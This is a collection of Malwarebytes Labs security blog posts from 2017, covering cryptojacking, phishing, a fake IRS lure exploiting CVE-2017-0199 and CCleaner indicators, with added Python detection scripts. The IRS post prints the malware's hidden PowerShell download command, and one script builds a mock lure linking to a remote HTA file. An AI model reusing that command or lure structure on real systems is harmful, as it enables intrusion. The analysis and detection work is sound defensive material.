Sep 26, 2017
John

Keychain vulnerability in macOS

On Monday, Patrick Wardle, a respected security researcher at Synack and owner of Objective-See, sent a tweet about a keychain vulnerability he had found in macOS High Sierra. As his tweet showed, it is possible for a malicious app to extract, and then exfiltrate, keychain data from High Sierra, with passwords clearly exposed in plain text.

In response to some questions, Wardle has also posted some additional information in an FAQ on Patreon.

This announcement set off a firestorm of articles on a variety of sites, which unfortunately caused a lot of FUD (fear, uncertainty, and doubt). In at least one case, I saw an article saying to hold off on installing High Sierra until this bug is fixed. It seems that many of these articles were written based solely on the contents of that tweet, but there is much more to be said.

It’s important to understand that the idea that people should wait to install High Sierra because of this bug is a very bad one, for multiple reasons.

First, as Wardle points out in his FAQ, this bug also affects Sierra and probably affects El Capitan as well. For all we know, it may go back further than that… only testing older systems can say for sure. So, you’ve probably got the vulnerability already anyway, whether you upgrade to High Sierra or not.

Second, installing updates and upgrades is an extremely important thing to do to keep yourself secure. If you don’t update, you don’t get important security fixes. If you skip upgrading to High Sierra because of one vulnerability (which you’re already vulnerable to anyway), that may mean that you will continue to be vulnerable to other issues that may have been fixed in High Sierra, but not in Sierra.

Keep in mind that the Mac fix for the extremely serious Broadpwn vulnerability was, apparently, only applied to macOS Sierra 10.12.6. So the old common knowledge that Mac security fixes go into the last three systems (El Capitan, Sierra, and High Sierra) does not seem to still be true, if it ever really was.

Third, let’s pretend for a moment that this was a vulnerability only affecting High Sierra. If you skip High Sierra, that implies that you think doing so makes you safe from keychain theft. Think again.

Consider, for example, the issue described in a blog post by Brenton Henry, in which a combination of an Apple tool and an AppleScript could be used to extract the contents of the keychain. That issue exists on older systems, but not Sierra or High Sierra.

Not only is the issue described by Henry a vulnerability that still exists on older systems, it’s a known vulnerability. That means that any script kiddie capable of doing a Google search would be able to implement it; it’s not that hard to do. Nobody knows yet how the vulnerability found by Wardle works, only that it exists.

As another example, think about the compromise of the HandBrake app in May, which led to systems being infected with the Proton malware. In that case, Proton was able to successfully trick the user into providing their password, and then exfiltrated that and their keychain files (among other things), which could be unlocked using that same password in most cases.

There was also the case of an interesting sample of the Dok malware one of our researchers received in a junk e-mail, which used an open-source Python remote access tool (RAT) that had the capability to exfiltrate the keychain and convincingly phish a user’s password.

These last two examples would work on any system, including High Sierra, since they involve theft of both the user’s password and the keychain files; no vulnerability in the keychain itself is needed.

Don’t get me wrong, this is a very bad vulnerability, and Apple should fix it as soon as possible. However, it’s not a world-ending catastrophe, nor is it a good reason to avoid installing High Sierra. There will always be vulnerabilities. Keeping your system and your software up-to-date is one of the best ways you can cope with them.

The post Keychain vulnerability in macOS appeared first on Malwarebytes Labs.

Powered by WPeMatico

Sep 25, 2017
John

Drive-by mining and ads: The Wild Wild West

There seems to be a trend lately for publishers to monetize their traffic by having their visitors mine for cryptocurrencies while on their site. The idea is that you are accessing content for free and in exchange, your computer (its CPU in particular) will be used for mining purposes.

The Pirate Bay started to run a miner on its site and later publicly acknowledged it. In other cases, the mining was a byproduct of malicious adverts, or it was done through legitimate but compromised websites into which cryptomining code had been injected directly.

Needless to say, this practice is raising many eyebrows, and not everyone agrees on whether this new business model could be a long-term replacement for ads (although most people agree that ads are often annoying and sometimes malicious).

But what exactly happens when publishers turn your PC into a miner and display ads at the same time? In this post, we take a look at what is arguably a bad mix.

Drive-by mining

Because mining happens in the browser via JavaScript without user interaction, we could compare it to drive-by downloads. As publishers need to retain the visitor’s attention so that the JavaScript code runs uninterrupted for as long as possible, this is where the type of content matters. We know that for example gaming or video streaming sites tend to keep people on their page much longer than others.

Figure 1: A streaming site that is (not so) silently mining cryptocurrency

There is one exception: in some cases, loading the JavaScript mining code once is enough, and the mining continues even after the user navigates to another site. This particular abuse technique affects Internet Explorer (the so-called zombie script) and was identified and reported, but not yet fixed, by Manuel Caballero.

This concept of mining digital currency via the browser is a little odd at first because it is well known how resource intensive mining can be, requiring powerful machines loaded with expensive hardware. While this is true for Bitcoin, it is not for other currencies that were designed for ordinary CPUs.

Take the Monero digital currency, powered by the CryptoNight algorithm, which was designed to be mined with a standard CPU with little difference in overall results compared to running more advanced hardware. This opens the door to a large and still mostly untapped market comprised of millions of typical consumer machines.

Coinhive advertises itself as “A Crypto Miner for your Website” and enables website owners to quickly set up mining by using their JavaScript API. Without a doubt, it has gained very rapid adoption but unfortunately is already being abused.

Figure 2: JavaScript API/code from Coinhive on the client side used to mine cryptocurrency
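The scan below is an added example, not code from the original post or from Coinhive. It flags the two indicators a defender would look for in a saved copy of a page: a script tag that loads the library from coinhive.com, and an inline constructor call (CoinHive.Anonymous, CoinHive.User or CoinHive.Token) followed by start(). The host, class names and the throttle option are taken from Coinhive’s public API as it stood in 2017; the sample pages and the site key in them are constructed.

```python
"""Flag in-page Coinhive-style cryptominers in saved HTML.

Added example with constructed sample pages; not code from the original post.
Loader host, constructor names and the 'throttle' option are as Coinhive
documented them in 2017. Other miner services are not covered.
"""
import re
from html.parser import HTMLParser

LOADER_HOST = "coinhive.com"

# new CoinHive.Anonymous('<site key>' [, options])
# new CoinHive.User('<site key>', '<user name>' [, options])
# new CoinHive.Token('<site key>', <target hashes> [, options])
CTOR_RE = re.compile(
    r"new\s+CoinHive\.(Anonymous|User|Token)\s*\(\s*['\"]([^'\"]+)['\"]"
    r"(?:\s*,\s*(?:['\"][^'\"]*['\"]|\d+))?"   # optional second positional argument
    r"(?:\s*,\s*(\{[^}]*\}))?",                # optional options object
    re.I | re.S,
)
THROTTLE_RE = re.compile(r"throttle\s*:\s*([0-9.]+)")
START_RE = re.compile(r"\.start\s*\(")


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_inline, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)      # browsers ignore the body when src is set
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def scan_html(html):
    """Return a list of findings (dicts); an empty list means no miner indicators."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        if LOADER_HOST in src.lower():
            findings.append({"kind": "loader", "src": src})
    for body in parser.inline:
        for m in CTOR_RE.finditer(body):
            throttle = THROTTLE_RE.search(m.group(3) or "")
            findings.append({
                "kind": "miner",
                "mode": m.group(1),
                "site_key": m.group(2),
                # 0 = full speed; Coinhive mines unthrottled when the option is absent
                "throttle": float(throttle.group(1)) if throttle else 0.0,
                "started": bool(START_RE.search(body)),
            })
    return findings


def verdict(html):
    """'mining' if a miner is constructed and started, 'loader-only' if only the
    library is pulled in, otherwise 'clean'."""
    findings = scan_html(html)
    if any(f["kind"] == "miner" and f["started"] for f in findings):
        return "mining"
    return "loader-only" if findings else "clean"


# Constructed sample pages (the site key is a placeholder, not a real one).
MINING_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
</head><body>
<video src="episode01.mp4" controls></video>
<script>
  var miner = new CoinHive.Anonymous('SITEKEY-PLACEHOLDER-0000', {throttle: 0.3});
  miner.start();
</script>
</body></html>"""

CLEAN_PAGE = """<html><body>
<script src="/static/player.js"></script>
<script>var autoplay = true;</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("mining", MINING_PAGE), ("clean", CLEAN_PAGE)):
        print(name, verdict(page), scan_html(page))
```

The throttle value is worth reporting alongside the verdict: a publisher who sets it to 0.3 is taking 70 percent of an idle core, while one who omits it runs the visitor’s CPU flat out, which is the difference between an annoyance and the kind of experience described in the next section. Obfuscated loaders that assemble the class name at runtime will evade these regular expressions, so on a live system a network-level block of the miner’s WebSocket traffic remains the more robust control.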

Gaming and video sites are typically resource intensive already, so running a miner at the same time seems bound to have a noticeable impact. Having said that, many people who consume copyrighted content are perhaps less likely to complain about a subpar user experience.

The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice.

Forced mining and malvertising

The same site pictured above was not only monetizing via Coinhive, but they also ran adverts. Clicking anywhere on the page – including the ‘Play’ button on the video – triggered a pop under advert that ran through various ad exchanges and resulted in malvertising in almost all instances, leading to tech support scams and several different exploit kit infection chains.

Tech support scams

Tech support scams are one of the most common redirections we see these days. While they do not usually infect your computer, they are still a threat to consider. The most common symptom is referred to as ‘Browlock’ because scammers use code that prevents you from closing your browser normally. The claims are always excessive and designed to scare users with made-up infections. Victims who call the posted number for help end up with more computer issues and several hundred dollars poorer.

Figure 3: Malvertising leading to tech support scam (Browlock) is triggered when clicking anywhere on the page

Figure 4: Web traffic showing redirection sequence from publisher to tech support scam page

RIG exploit kit

RIG is the most popular exploit kit these days and malvertising is its prime delivery mechanism. Victims are filtered using the same tools that marketers have to profile consumers, and there can be a secondary level of filtering, usually via a gate that performs geolocation checks for example.

Figure 5: RIG EK via malvertising chain

Terror exploit kit

Terror EK is on a much smaller distribution scale than RIG but is still a fairly active exploit kit that tries out different things. For instance, some Terror EK infection chains use SSL encryption (via free certificates from Let’s Encrypt). It also has an interesting gate with one of the most convoluted iframe encodings we have seen.

Figure 6: Terror EK via malvertising, and gate before landing page

Block less or more?

One of the first reactions to the rise of browser cryptominers was to ask how to block them, whether with a typical ad blocker or URL/IP blacklist and even by disabling JavaScript. There’s no question that users are annoyed by a rollout that did not include their opinion, even though many were actually favorable to this alternate solution to online ads.

While cryptominers do have an impact on system resources, there was at least a sense that they may be safer and less intrusive than ads. But publishers ought to be more transparent with their audience because no-one likes unannounced guests. Unfortunately, there will always be publishers that care very little about what kind of traffic they push, so long as it generates good revenues; for those, cryptominers are just an added income to their existing advertising portfolio.

Malwarebytes users are already protected against this drive-by mining. In fact, we are blocking over 5 million connection attempts to Coinhive every single day, which shows that browser-based mining has really taken off in a big way.

Our goal is to protect people from unsolicited drive-by cryptomining. Users who are aware of the mining and want to participate can still do so by adding an exclusion for this domain.

Indicators of compromise

Tech support scam

192.241.220[.]40/877microsoft/

RIG EK

Fobos: hudsonentertainment[.]info/
Fobos: 204hdchdhhh[.]cf/tako/?re=6128546021
RIG IP: 188.225.83[.]85
43bc543d26f755474b355a70c25077df8ab71836056619216792a112a79bcd3d

Terror EK

onpakfucli.salary-radar[.]bid/search-w3kpShD3axxD/R5ALkH3JyPBC/rzcp4YrhDgzu.html
wabusfqdty.salary-radar[.]bid/search-w3kpShD3axxD/iqW1OavoNisD.php
4fccf7246b6807e22c42dd93507592cca0594694f4487b03db04ef13e7a99c54

The post Drive-by mining and ads: The Wild Wild West appeared first on Malwarebytes Labs.


Sep 25, 2017
John

A week in security (September 18 – September 24)

Last week, we kept you updated on our blog about the infected versions of CCleaner that were offered as downloads on the official servers.

We also warned you against a fake IRS notice that delivers a customized spying tool, some of the threats currently facing gamers, and a Netflix scam that has been doing the rounds in Europe.

Mac users learned how to tell if their Mac is infected and Advanced Tech Support victims learned how to apply for a (partial) refund.


Stay safe!

Malwarebytes Labs Team

The post A week in security (September 18 – September 24) appeared first on Malwarebytes Labs.


Sep 22, 2017
John

Netflix scam warning

Always be on your toes

While we are used to receiving scam attempts pretending to be from banks, online shops, credit card companies, and international courier services, that does not mean all other emails are safe. Far from it. To demonstrate this point, we will show you a scam aimed at Netflix customers which has been used in the Netherlands and is now doing the rounds in the UK, but could just as easily spread to the US.

The mail in question

The sender address, in this case, was supportnetflix@checkinformation[.]com, and the content of the email informs us that there has been a problem with our last payment. Obviously, to those of us who are not customers of Netflix, this is the first red flag. The fact that the domain name checkinformation[.]com does not belong to Netflix is another big red flag. In fact, the domain is for sale at the moment of writing, which tells you how little the scammers invested in it.

phishing mail

Netflix

Account disabled!

Dear User,

We’re having some trouble with your current billing information. We’ll try again. But in the meantime you may want to update your payment details. During the next login process, you will be required to provide some informations like (billing info, phone number, payment info)

So the email asks us to fill out our payment details on a linked site. That should always be a red flag. A security-aware company does not send you a clickable button leading to a form that asks for billing information; it tells you to log into its site yourself and explains how to proceed from there.

Pay attention to

When you have to provide such details always look for the green padlock in the address bar of your browser.


Remember that the green padlock is a necessary condition, not a sufficient one. It only tells you that the connection is encrypted and that the certificate matches the address shown in the bar; it says nothing about who owns that address, and phishing sites obtain certificates too. Check that the domain itself is the company’s before you proceed.

Another telltale sign is spelling errors, but again, the lack of them is not a definite green light to proceed. Scammers have learned that their efficiency goes up if they pay attention to their spelling.

Also never judge a site by its looks, because phishers are masters in the art of copying the layout and images from legitimate sites. In fact, they usually link to the actual layout and images of the website they are pretending to be.

Links

The Guardian: Watch out for Netflix email scam that looks like the real deal

In January another Netflix scam was analyzed by FireEye.

Guideline to help determine whether a website is legitimate.

 

Pieter Arntz

The post Netflix scam warning appeared first on Malwarebytes Labs.


Sep 21, 2017
John

Don’t let these gaming threats give you a Game Over

With EGX, the biggest gaming event in the UK opening its doors today, we thought it’d be timely to remind you of some of the threats currently facing gamers. No matter what type of game, client, or system you use, there’s always something waiting to try and give you a bad day where the safety of your account is concerned.

GTAV cash generators

Some games, like GTAV, involve an amount of “grinding” (performing potentially repetitive tasks) to get what you want. In this case, incredibly expensive items/additional content which are free to download, but cost in-game money to make use of. In GTAV, you can buy in-game currency with real money to speed up the process, grind, or turn to the internet in search of free money tools. While modders in game sessions can – and do – spawn money from the sky, or only add cash to your account, the huge pile of YouTube videos and web comments claiming to offer free services online are all fake. The so-called money generators are merely survey scams, which lead to requests for personal information or downloadable files (which may or may not be malicious).


Steam scams

These are very popular, especially with accounts being able to buy and sell (expensive) digital items for various titles, adding extra desirability to scammers wanting to make a quick buck. Phishing is a mainstay of Steam scams; other attacks, such as swiping a Steam SSFN file to bypass Steam Guard are much more sophisticated. Be wary of fake item trades, especially if they don’t lead to an official Steam URL – you may well be looking at a static phishing page, or one which scrapes some elements from the real thing to appear legitimate.



Read: Something’s phishy: How to detect phishing attempts


Swatting

The act of sending armed law enforcement round to a game streamer’s house, which could potentially be fatal. Streamers usually get caught by this by being too open with their personal information – quite often, you’ll find out all you need to know about your target simply by listening to them stream. Before you know it, they’ll have casually mentioned locations, even nearby streets where their friends live, and much more besides. Calls to said friends pretending to be someone else, for example, will fill in the missing pieces of the puzzle.

Ironically, the main way to avoid swatting (for the most part) is to tell people who make a living out of talking to stop talking about themselves, at least a little. This is no guarantee of safety; many other ways exist to obtain a home address from publicly available information. All in all, streaming is a bit of a dangerous pastime.

Game company hacks

There’s not a huge amount you can do when the gatekeepers of your data get popped, but that doesn’t mean you should be complacent. Many game companies and hardware makers now offer additional forms of security such as key fobs and two-factor authentication, which you should make use of whenever possible. You may also wish to use a password manager to ensure you’re not just reusing the same passwords everywhere, which could lead to additional compromises. Modern gaming can require multiple passwords across different gaming platforms just to play one game, so it’s fairly common to see video game password burnout – don’t fall for it!

Fake emulators

It’s becoming increasingly difficult to obtain old game consoles, much less play the original titles. Even on consoles where backwards compatibility exists, titles differ from how they were originally, or licensed music has been replaced, or the control scheme is different, or maybe it works on this console but not properly on that mobile device, and anyway it’s funded by ads, and so on.

Entering stage left: fake emulators. It is still challenging to emulate most of the last generation (or two) of consoles, and you should be extremely wary where such claims are concerned.


These are some of the most common problems we see on a daily basis in gaming land; feel free to offer up some of the scams you’ve seen doing the rounds in the comments below. Safe gaming!

 

The Malwarebytes Labs Team

The post Don’t let these gaming threats give you a Game Over appeared first on Malwarebytes Labs.


Sep 21, 2017
John

Fake IRS notice delivers customized spying tool

While macro-based documents and scripts make up the majority of malspam attacks these days, we also see some campaigns that leverage documents carrying exploits. Case in point, we came across a malicious Microsoft Office file disguised as a CP2000 notice. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when information is incorrectly reported on a previous return.

Victims that fall for the scam will infect themselves with a custom Remote Administration Tool. A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s consent or knowledge to remotely control their machine, view and delete files or deploy a keylogger to silently capture keystrokes.

In this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.

Distribution

The malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email. The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, it downloads the final payload, all with very little user interaction required since it is using CVE-2017-0199, first uncovered in April 2017 as a zero-day.

82.211.30[.]108/css/CP2000IRS.doc

The embedded link points to an HTA script hosted under an unexpected location – a Norwegian company’s compromised FTP server – which invokes PowerShell to download and execute the actual malware payload.

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
-WindowStyle Hidden (New-Object System.Net.WebClient)
.DownloadFile('http://82.211.30[.]108/css/intelgfx.exe',
'C:\Users\[username]\AppData\Roaming\62962.exe');
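To show what the “OLE2 embedded link object” stage looks like on disk, here is an added triage script; it is not code from the original post and is not derived from the CP2000IRS.doc sample. For OOXML documents it lists oleObject relationships whose TargetMode is External or whose target is a URL, which is the property Word follows when it fetches the remote HTA; for RTF lures it applies a weaker control-word heuristic. The in-memory sample package and the ftp.example.invalid host are constructed. Legacy binary .doc files are not parsed, and legitimate documents can carry external OLE links, so treat a hit as a reason to look closer, not as a conviction.

```python
"""Triage Office documents for the remote OLE link pattern behind CVE-2017-0199.

Added example, not code from the original post or the sample it analyses. It
handles OOXML packages (docx/dotx) by reading relationship parts, plus a weak
heuristic for RTF lures; legacy binary .doc (OLE2 compound files) is not parsed.
A benign document can legitimately carry an external OLE link, so a hit is a
triage indicator, not proof of malice.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
REMOTE_SCHEME = re.compile(r"^(?:https?|ftp|file)://", re.I)


def external_ole_links(package_bytes):
    """Return (rels_part, target) pairs for OLE relationships resolving outside the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as z:
        for name in z.namelist():
            if "_rels/" not in name or not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                target = rel.get("Target", "")
                # TargetMode="External" is what makes Word fetch the object from a URL.
                if rel.get("TargetMode") == "External" or REMOTE_SCHEME.match(target):
                    hits.append((name, target))
    return hits


def triage(data):
    """Classify raw file bytes: 'ooxml-remote-ole', 'rtf-autolink' or 'no-indicator'."""
    if data[:4] == b"PK\x03\x04":
        return "ooxml-remote-ole" if external_ole_links(data) else "no-indicator"
    if data[:5].lower() == b"{\\rtf":
        low = data.lower()
        # Heuristic: an auto-updating linked object is how RTF lures trigger the fetch.
        if b"\\objautlink" in low and b"\\objupdate" in low:
            return "rtf-autolink"
    return "no-indicator"


def build_sample_docx(target, external=True):
    """Construct a minimal OOXML package in memory (test fixture, not a real lure)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="{target}"'
        + (' TargetMode="External"' if external else "") + "/>"
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder host; the real lure fetched its HTA from a compromised FTP server.
    lure = build_sample_docx("ftp://ftp.example.invalid:21/httpdocs/test/template.hta")
    print(triage(lure), external_ole_links(lure))
    print(triage(build_sample_docx("embeddings/oleObject1.bin", external=False)))
```

Run it over a mail gateway’s quarantine and sort by target scheme: an oleObject relationship pointing at ftp:// or at a bare IP address, as in this campaign, deserves a look before anything else. Pair it with a process-creation rule for PowerShell spawned by WINWORD.EXE with -WindowStyle Hidden and a WebClient download, which is the second stage shown above and is far harder for the attacker to vary.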

Payload

The downloaded payload (intelgfx.exe) extracts several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to remain invisible to the victim.

The RMS agent, where RMS stands for Remote Manipulator System, is a remote control application made by a Russian company. It appears that in this case the attackers took the original program (as pictured below) and slightly customized it, not to mention that they are using it for nefarious purposes, namely spying on their victims.

Strings in the binary show the debug path information and the name the attackers gave to the module.

Office exploits and RATs

This is not the first time that CVE-2017-0199 has been used to distribute a RAT. In August, TrendMicro described an attack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits, which can be perfectly legitimate, and turn them into full-fledged spying applications.

We reported the compromised FTP server to its owner. Malwarebytes users were already protected against CVE-2017-0199 as well as its payload which is detected as Backdoor.Bot.

Thanks to @hasherezade for help with payload analysis.

Indicators of compromise

Word doc CVE-2017-0199

82.211.30[.]108/css/CP2000IRS.doc
47ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1

HTA script

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta
d01b6d9507429df065b9b823e763a043aa38b722419d35f29a587c893b3008a5

Main package (intelgfx.exe)

82.211.30[.]108/css/intelgfx.exe
924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8

RAT module

4d0e5ebb4d64adc651608ff4ce335e86631b0d93392fe1e701007ae6187b7186

Other IOCs from same distribution server

82.211.30[.]108/estate.xml
82.211.30[.]108/css/qbks.exe

The post Fake IRS notice delivers customized spying tool appeared first on Malwarebytes Labs.


Sep 20, 2017
John

FTC providing partial refunds for Advanced Tech Support victims

Last month, the FTC announced the recovery of 10 million dollars from Advanced Tech Support, one of the most successful US-based tech support scammers ever. This money will be put towards partial refunds for victims of ATS who purchased products or services from them between April 2012 and November 2014. Per the FTC announcement, the deadline for a refund is October 27. To repeat:

The deadline for a refund application is October 27.

Restitution from Advanced Tech Support is notable because most scams based in the United States structure their finances such that only a small core of founders ever see a significant profit. These founders then tend to spend most of their money on extravagant parties, vacations, and other ostentatious displays of wealth – leaving very little to recover. Due to these factors, it’s noteworthy that the FTC was able to recover any significant amount of money at all.

Advanced Tech Support, otherwise known as Inbound Call Experts, has had a lengthy history with Florida law enforcement and the FTC. Check out their case history here, where you can follow the long road it took to bring this company to justice.  And remember:

The deadline for a refund application is October 27.

The post FTC providing partial refunds for Advanced Tech Support victims appeared first on Malwarebytes Labs.


Sep 20, 2017
John

How to tell if your Mac is infected

There are a lot of reasons Mac users don’t sweat getting infected. One: They’ve got a built-in anti-malware system called XProtect that does a decent job of catching known malware. Two: Macs are not plagued by a high number of attacks. (Most cybercriminals are focused on infecting PCs.) And three: There’s just not a lot of Mac malware out there.

But that’s changing, and fast: Mac malware has increased by 230 percent in the last year alone. Most Mac users don’t know this, and assume their Mac is fine. For those folks we have one word: adware.

Your Mac is infected…with adware

Adware is software that’s designed to display advertisements, usually within a web browser. Most people don’t willingly download programs whose sole purpose is to bombard you with ads, so adware has to sneak its way onto your Mac. It either disguises itself as legitimate or piggybacks on another program in order to be installed.

Once in your system, adware changes the way your browser behaves by injecting ads into web pages, causing pop-up windows or tabs to open, and changing your homepage or search engine—all in the name of funneling advertising dollars away from companies who pay for online ads and into their own accounts.

Your Mac is infected…and not protected

Sounds pretty shady, right? So why doesn’t the Mac anti-malware program catch these guys? Typically, the makers of adware are hiding in plain sight, operating as actual corporations who claim to sell legitimate software. They get away with it because their adware is often buried in the fine print of a long installation agreement that most people skip over. Is it technically legal? Yes. You accepted the terms of the installation, so they can spam you all they want. But is it right? So far, Apple hasn’t stepped in to crack down on it. But if you ask us, the answer is an emphatic “no.”

In addition to adware, other potentially unwanted programs, such as so-called “legitimate” keyloggers, scammy “cleaning” apps, and faux antivirus programs that don’t actually detect anything are skirting the Mac protections in place. (Because XProtect doesn’t detect and block adware or potentially unwanted programs—only malware that it has seen before.) So if a new form of malware makes its way onto your computer before Apple has a chance to learn about it and write code to protect against it, then you’re out of luck.

So if you ask us, it’s time to start taking a closer look at your Mac. Is it acting the way your sturdy, reliable Mac has always behaved? Or is it exhibiting classic signs of guilt? If something seems a little off, you just might have a problem. Let’s take a look at the telltale signs that your Mac is infected.

Signs of adware

Advertisements are displayed in places they shouldn’t be, literally popping up everywhere. Your web browser’s homepage has been mysteriously changed without your permission. Web pages that you typically visit are not displaying properly, and when you click on a website link, you get redirected to an entirely different site. In fact, even your search engine has been replaced with a different one. If your web browser, search engine, or websites are acting in funky, unpleasant ways, you’ve likely got yourself an adware infection.

Signs of PUPs

Maybe you downloaded a new program to monitor your family’s behavior online. All of a sudden, new icons are appearing on your desktop for software you don’t remember installing. New toolbars, extensions, or plugins are added to your browser. A pop-up appears telling you your Mac may be infected, and you need to install the latest antivirus immediately to get rid of it. Frightened, you do so, and now your computer has turned the corner from automatically installing apps to slowing to a crawl. What’s going on? These are PUPs, and your Mac’s anti-malware system is not going to get rid of them.

Signs of malware

Mac malware making its way onto your system is, right now, relatively rare. But if it does, you may look out for behavior similar to that of an infected Windows system: your computer’s processing power seems diminished, software programs are sluggish, your browser redirects or is unresponsive, or your old reliable starts crashing regularly.

In some cases, you may not be aware of an infection at all. While your computer hums along, info stealers operate quietly in the background, stealing your data for an attack on your bank accounts or identity.

And in the worst case scenario, your Mac can even be infected with ransomware. In March 2016, the first Mac ransomware was spotted, and it was downloaded by thousands of users before Apple had a chance to shut it down. A ransomware attack would be quite obvious to Mac users. Files would be encrypted and cybercriminals would deliver a ransom demand (usually via pop-up) in order to return your data.

Do any of these scenarios sound familiar to you? If so, there are a few steps you can take to remedy the infection. First, back up your files. Next, download a (legitimate) anti-malware program such as Malwarebytes for Mac that’s designed to search and destroy adware, PUPs, and any new forms of malware lurking on the scene. Run a scan and, if there are any nasties hiding away in your pristine Mac OS, it’ll bag, tag, and dump them for you. Then you can finally get your Mac back.

The post How to tell if your Mac is infected appeared first on Malwarebytes Labs.


Sep 20, 2017
John

A week in security (September 11 – September 17)

Last week, we dug into phishing campaigns run through LinkedIn accounts, remediation versus prevention, issues with smart syringe pumps, and advised you to go patch against a Word 0day. We had some tips regarding identity theft protection, explored crowdsourced fraud, and explained YARA rules.


Stay safe!

Malwarebytes Labs Team

The post A week in security (September 11 – September 17) appeared first on Malwarebytes Labs.


Sep 20, 2017
John

[Updated] Infected CCleaner downloads from official servers

Update (9/19/2017):

Avast posted a clarification explaining what happened and giving a timeline of the events. One point we should take note of is that the breach preceded the takeover of Piriform by Avast.

Users that are unsure whether they were affected by this and whether their data may have been sent to the C2 server can check for the presence of the following values under the registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Piriform\Agomo

The values in question are:
MUID, TCID and NID

These values are not created by any clean versions of CCleaner, just by the infected ones.

Malwarebytes will detect the presence of those values and flag them as Trojan.Floxif.Trace

The trojan itself reportedly only ran on Windows 32 bit systems, but the values above were created on 64 bit systems as well.
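Checking one machine is a regedit lookup; checking a fleet usually means collecting ‘reg export’ dumps and grepping them. The following added example (not code from the original post) parses such a dump and reports which of the three value names are present under the Agomo key, matching on the tail of the key path so that dumps taken from the WOW6432Node view are handled as well, and it checks a reported version string against the two affected builds. The export text and the value data in it are constructed placeholders.

```python
"""Triage 'reg export' dumps for the trojanized CCleaner 5.33 registry indicators.

Added example, not code from the original post. The key path and value names
(MUID, TCID, NID) are those given in the update above; the export text below is
constructed, and the value data in it are placeholders. Matching is on the key
path's tail so a dump taken from the WOW6432Node view is handled as well.
"""

AGOMO_TAIL = "\\piriform\\agomo"
AGOMO_VALUES = {"MUID", "TCID", "NID"}
AFFECTED_BUILDS = {"CCleaner": "5.33.6162", "CCleaner Cloud": "1.07.3191"}


def parse_reg_export(text):
    """Parse REGEDIT 5.00 export text into {key_path: {value_name: raw_data}}.

    Handles the trailing-backslash continuation lines that 'reg export' uses
    for long hex values.
    """
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        if line.endswith("\\"):              # value data continues on the next line
            pending = line[:-1]
            continue
        pending = ""
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"'):
            name, _, data = line.partition("=")
            keys[current][name.strip('"')] = data
    return keys


def agomo_indicators(keys):
    """Return the value names, written only by the trojanized build, found under
    ...\\Piriform\\Agomo in either registry view."""
    found = set()
    for path, values in keys.items():
        if path.lower().endswith(AGOMO_TAIL):
            found |= AGOMO_VALUES & set(values)
    return sorted(found)


def version_affected(product, version):
    """True when the installed build is one the advisory names as trojanized."""
    return AFFECTED_BUILDS.get(product) == version


# Constructed export; the hex/dword/string data are placeholders, not real samples.
SAMPLE_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Piriform]

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Piriform\\Agomo]
"MUID"=hex:00,11,22,33,44,55,66,77,88,99,aa,bb,cc,dd,ee,ff,00,11,22,33,44,55,\\
  66,77,88,99
"TCID"=dword:00000001
"NID"="placeholder"
"""

CLEAN_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Piriform\\CCleaner]
"UpdateCheck"=dword:00000001
"""

if __name__ == "__main__":
    print(agomo_indicators(parse_reg_export(SAMPLE_EXPORT)))   # ['MUID', 'NID', 'TCID']
    print(agomo_indicators(parse_reg_export(CLEAN_EXPORT)))    # []
    print(version_affected("CCleaner", "5.33.6162"))           # True
```

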